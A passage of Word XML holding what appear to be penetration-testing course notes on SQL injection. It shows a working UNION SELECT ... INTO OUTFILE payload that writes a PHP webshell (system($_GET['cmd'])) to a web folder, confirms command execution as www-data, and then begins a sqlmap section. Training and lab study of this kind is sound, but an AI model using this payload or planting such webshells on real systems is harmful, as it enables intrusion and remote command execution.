        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we have full control over the system, we can now easily upgrade our SQL shell to a more standard reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now let's move to MySQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the various MySQL database variants don't offer a single function to escalate to RCE, we </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> abuse the</w:t>
      </w:r>
      <w:hyperlink r:id="rId486">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId487">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SELECT INTO_OUTFILE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement to write files on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this attack to work, the file location must be writable to the OS user running the database software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As an example, let's resume the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload on our MySQL target application we explored previously, expanding the query that writes a</w:t>
      </w:r>
      <w:hyperlink r:id="rId488">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId489">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">webshell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll issue the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL keywords to include a single PHP line into the first column and save it as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a writable web folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT "&lt;?php system($_GET['cmd']);?&gt;", null, null, null, null INTO OUTFILE "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/tmp/webshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 30 - Write a WebShell To Disk via INTO OUTFILE directive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The written PHP code file results in the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;? system($_REQUEST['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 31 - PHP web shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function will parse any statement included in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter coming from the client HTTP REQUEST, thus acting like a web-interactive command shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001800">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we try to use the above payload inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lookup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint, we receive the following error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001801">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2451100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 17: Writing the WebShell to Disk" id="428" name="image430.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 17: Writing the WebShell to Disk" id="0" name="image430.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId490"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 17: Writing the WebShell to Disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001802">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fortunately, this error is related to the incorrect return type and should not impact writing the webshell on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001803">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To confirm, we can access the newly created webshell inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder along with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001804">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="977900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 18: Accessing the Webshell" id="542" name="image530.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 18: Accessing the Webshell" id="0" name="image530.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId491"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="977900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 18: Accessing the Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001805">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! The webshell is working as expected since the output of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command is returned to us through the web browser. We discovered that we are executing commands as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, an identity commonly associated with web servers on Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001806">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we understand how to leverage SQLi to manually obtain command execution, let's discover how to automate the process with specific tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001807">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001808">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bxpantnvkdfa" w:id="198"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Code Execution (SQL Map) (SQL Injections)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More SQLmap practice can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId492">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Butch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001810">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001811">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (10.3.2 Automating the Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001812">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001813">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This following example does everything that the previous section (Manual Code Execution) did, but it's now automated with SQLMap. I wanted to include this since it's a nice illustration of what exactly SQLMap does, since we can always reference our manual commands from the previous section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001814">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001815">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL injection process we followed can be automated using several tools pre-installed on Kali Linux. In particular,</w:t>
      </w:r>
      <w:hyperlink r:id="rId493">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId494">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sqlmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can identify and exploit SQL injection vulnerabilities against various database engines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001816">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
